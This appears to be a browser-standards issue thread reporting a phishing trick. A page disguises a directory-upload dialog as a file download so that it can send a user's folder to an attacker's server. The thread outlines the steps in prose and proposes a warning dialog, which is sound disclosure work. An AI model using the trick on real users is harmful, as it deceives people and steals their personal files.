Security issue of directory upload: pretend to download when actaully to upload a directory

[duanyao]

This issue was reported by alibaba.com and further demostrated here.

For those who don't read Chinese, I rephrase this issue as follow:

1. A malicious web page show a button: "Click to download X software for free!"
2. When a user click the button, the web page triggers a directory upload dialog.
3. The user may overlook that the dialog is not "save as" but "select a directory to upload" and select a directory to save the file.
4. The web page upload the directory to attacker's server.
5. The web page may show a message: "Download failed, please retry", and replace the button mentioned above with a normal download button. So the user won't realize that upload instead of download happened.

I think UAs may show a warning dialog before showing the directory upload dialog: "The site xxx is asking you to upload a directory. Depending on the content of the directory, this may leak your personal information. Continue?"

[DanielHerr]

Most users would probably realize this since in addition to the "Select a folder to upload" text, there would also be no textbox for the name of the file to save.

[duanyao]

Sorry for the late response. Sure, but some users may be accustomed to keep the original file name when downloading a file, so they may overlook that the file name is not shown. Addtionally, some users may interpret the missing of the file name as "a recent UX change of the browser" rather than a fishing trick.